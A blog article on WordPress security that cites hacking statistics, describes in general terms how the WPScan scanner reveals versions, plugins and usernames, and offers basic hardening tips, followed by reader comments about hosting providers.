WordPress Security Based on Facts and Statistics

If you purchase through a link on our site, we may earn a commission. Learn more.

WordPress has become a common target for malicious hackers because it is easy to break into. Just last year over 170,000 WordPress blogs and websites were hacked, and for 2013 the number of hacked WordPress sites is expected to increase even more. Why is it so when WordPress itself is a very secure platform? Let’s have a look at some statistics from last year’s incidents and learn from them so your WordPress is not the next target.
Table of Contents

WordPress has become a common target for malicious hackers because it is easy to break into. Just last year over 170,000 WordPress blogs and websites were hacked, and for 2013 the number of hacked WordPress sites is expected to increase even more.

Why is it so when WordPress itself is a very secure platform? Let’s have a look at some statistics from last year’s incidents and learn from them so your WordPress is not the next target.

Learning from WordPress Hacking Facts

Below are the statistics from the 117,000 hacked WordPress sites reported during last year. I am using the word “reported” because not all website hacks are reported and made public. Typically the number of defaced and hacked WordPress blogs and websites is much bigger.

41% where hacked via their hosting provider. This means that the hackers exploited a vulnerability, or took advantage of insecure hosting provider configuration to be able to hack into the WordPress blogs and websites hosted by the vulnerable hosting provider.

29% where hacked via a vulnerability in the WordPress theme they were using. This means a hacker identified a vulnerability in a theme that was installed on the WordPress installation and by exploiting it, the attacker managed to gain access to the WordPress website.

22% where hacked via a vulnerability in a plugin that was installed on WordPress. The same as above, this means that a hacker exploited a vulnerability in an installed plugin.

8% where hacked because an account on that WordPress installation was using a weak password.

How to Hack a WordPress Website

After looking at the facts, let’s see how easy it is to hack a WordPress blog or website using a free tool called WPScan. WPScan is a black box WordPress vulnerability scanner; it can scan a WordPress website and identify known issues and insecure configurations. By launching a default WordPress security scan with WPScan against a WordPress site you will instantly find out the following:

  • Which version of WordPress is runnning
  • Which theme is installed, its version and the path where it is installed
  • Which plugins are installed , their version and the path where they are installed

With WPScan you can also run several other advanced scans, such as a WordPress user enumeration scans where the scanner will identify and enumerate all usernames on the target WordPress website. This makes it easier for the attacker to launch a WordPress password brute force attack.

Thanks to these simple scans which only take a couple of minutes, a malicious hacker can:

  • Login to your WordPress and gain admin access if any of your accounts were using a weak password
  • Exploit a known vulnerability in WordPress if you are running an old version of WordPress to gain access to your website
  • Exploit a known vulnerability in any of your WordPress plugins and themes if you are not running the latest versions.

As seen above it is really easy to identify problems within a WordPress installation, and maybe hack it. But then again, this is not a realistic scenario. Typically malicious hackers have automated tools that check a range of websites for known vulnerabilities and if any are flagged they are broken into. So in reality it is even easier than you think to hack a WordPress blog or website.

What Can Happen During a WordPress Hack Attack

Once a malicious hacker manages to gain access to a WordPress blog or website, he or she typically makes any of the following changes and more to try to hide the traces and retain access to the WordPress installation:

  • Create a new account with admin privileges
  • Reset a password of several accounts to ensure other users cannot regain access to their WordPress
  • Change the role of an existing dormant account
  • Change the content to inject it with malicious code
  • Tamper WordPress source code files with malicious code such as backdoors
  • Make redirects in htaccess files

If your database has been impacted, there are plugins to clean up WordPress databases.

How to Protect WordPress from Hack Attacks

As we have just seen, hacking a WordPress is very easy, and the good news is, so is securing it. By looking back and learning from the facts, here are some easy tips to get you started and improve the security of your WordPress website:

  1. Before choosing or changing the hosting provider make some basic research; check forums etc and see what other people, fellow bloggers and WordPress administrators think of the hosting provider you would like to use.
  2. Before installing a WordPress theme or plugin make some research and ensure that they are frequently updated and legit. Follow the guide How to Choose the Best Plugin for WordPress for more information about choosing the right and a secure WordPress plugins and themes.
  3. Remove or rename the WordPress default administrator account. If you are not sure how, follow this How to Change a WordPress username guide.
  4. Use strong passwords. By strong passwords I mean it should be at least 8 characters long, should not be a dictionary word or your dog’s name, should contain both upper case and lower case letters, numbers and special characters such as !,&, ?
  5. Keep your WordPress, plugins, themes and any other software you use UP TO DATE by always using the latest available version and by always applying the latest security patches provided by the vendor.
  6. Monitor the activity of your WordPress website and users with a security plugin such as WP Security Audit Log plugin. This plugin is similar to the Windows Event Log or Syslog on Linux/Unix; it logs all type of activity on your WordPress blog or website.

By following all of the tips above, the security of your WordPress will be drastically improved and your WordPress will be protected against the most common widespread attacks.

Taking WordPress Security a Step Further

There are several other things you can do to further improve the security of your WordPress. As already explained, the above are just the basics and should protect your WordPress from the most common widespread attacks, but if you have the budget and if your WordPress is the hub of your business, it is recommended to further beef up the security of your WordPress to ensure you are also protected from targeted attacks. For example you can implement two factor authentication on your WordPress, protect your wp-admin from zero days vulnerabilities with HTTP authentication, or follow an online WordPress security course. Frequent professional WordPress security audits are also recommended to ensure that your WordPress has no security holes that could be exploited by malicious attackers.

Keeping Up with WordPress Security

Security is not a one time thing or process, it is a never ending process. The things you do now and in the future might and will affect the security of your WordPress. But don’t fret, although it sounds like a daunting task that will haunt you forever, as you can see it is not rocket science. Strictly speaking, most of it is common sense.

Robert Abela

Robert is the CEO and founder of WP White Security, a niche WordPress security plugin development company based in the Netherlands, Europe. Their flagship product is WP Security Audit Log, the most comprehensive and widely used activity log plugin for WordPress sites and multisite networks.

Discover more from our archives ↓

Popular articles ↓

9 Responses

  1. Hi James,

    Thank you for your positive feedback. The statistics you referred do were done by me as well, WP White Security is my website.

    As regards hosting, correct, I agree. But we shouldn’t blame hosting for not helping users securing their WordPress. And as Hackrepair pointed out, it is almost impossible for a hosting provider to implement mod_security for everyone because of compatibility issues. Else one has to implement a very lenient implementation not to affect other websites.

  2. Great post, Robert.

    James from ManageWP here.

    Security is such a problem for WordPress, and it’s clear that the security assault on WordPress isn’t going to stop. It’s just such a popular target to do massive amount of damage since so much of the Web runs on WordPress. Thanks for writing about this.

    Here’s another post I recently read that opened my eyes that would compliment this one (especially if you like stats): Statistics Show Why WordPress is a Popular Hacker Target

    A majority of our customers strongly desire security features, and it’s clearly obvious why. But, interestingly enough, it seems that webhosts, themselves, will likely play a bigger interest/role in securing WordPress on their own servers. Hopefully this results in less problems down the line, particularly for newer users who don’t know what they’re doing.

    1. There are real limits as to what a web host can do. While mod security rules and like can be helpful, they may likewise conflict with other clients. So it’s a catch-22 type situation.

      Hosts are about getting and “keeping” their customers. Doing things that may actually cause clients to move out due to ongoing issues are the reason why you will not normally see a shared host “including” NGINX or pre-set mod_security rules and the like.

      That said, most hosts believe that if a client “requires” a greater level of security they are willing to pay for it, in the form of VPS or cloud type hosting services, et al.

      The “Walmart hosts” are keen to sell you their add-ons to improve security, which is why most won’t include security “out of box” because, well, it’s going to hit their button line.

      Btw: if you didn’t know this, the “Walmart hosts” don’t make a dime on hosting. It’s the up-sell where they make their money. Reality check. . .

      Which is why it’s important than when you choose your web host you only choose one where they present and describe security as “their main feature” on their home page. Just Google, for “Website Security and Customer Service hosting” to find the cream of the crop hosting wise.

      1. I agree with most your points, and it’s exactly the point I was getting to. Which is why, in general, you shouldn’t opt for “Walmart hosts” (kudos for the term) in the first place where you have a real business to run, because the security, in general, is horrid.

        As to your other points, I’m very much aware. Having just attended HostingCon, webhosts realize what they need to do, and there’s no question that there’s going to be a price tag associated with it, because most people (not even yours truly) knows the exact proper configurations for a VPS to make it sound and secure. So you either need to hit some lengthy tutorials on security, or you’ll pay for the privilege for someone else to ensure that security matters.

        As for shared, cookie-cutter hosting, they realize that it’s time for them to step up their game, and we’re going to see a lot of innovations in the next couple years on this front. 🙂

  3. I like your comment about choosing hosting providers. There are a lot of great “WordPress” providers out there with nearly instant customer service and support tailored for WordPress folks.

    WPEngine, TVC.Net and Page.ly are well regarded and good first looks when in need of a fast responsive, customer service oriented host.

  4. Excellent lowdown on WordPress security Robert, I’m sure many will find it useful. I’ll take the opportunity to remind our followers about our WordPress security lockdown service, through which we secure WordPress websites from the hacking possibilities mentioned above.

    1. Hi Goodwin,

      The statistics have been taken from an infographic which was published earlier on this year by WP Template. Here is more information about the infographic and statistics;

      The list of sources WP Template used to generate the infographic are listed at the end of the infographic itself.

      In the meantime I am also working on some new interesting statistics which should also reflect the current situation of current WordPress installs and how quickly and frequently they are updated. Such statistics should be available later on the WP White Security website.

Share Your Thoughts

Your email address will not be published. Required fields are marked *

Claim Your Free Website Tip 👇

Leave your name, email and website URL below to receive one actionable improvement tip tailored for your website within the next 24 hours.

"They identified areas for improvement that we had not previously considered." - Elliot

By providing your information, you'll also be subscribing to our weekly newsletter packed with exclusive content and insights. You can unsubscribe at any time with just one click.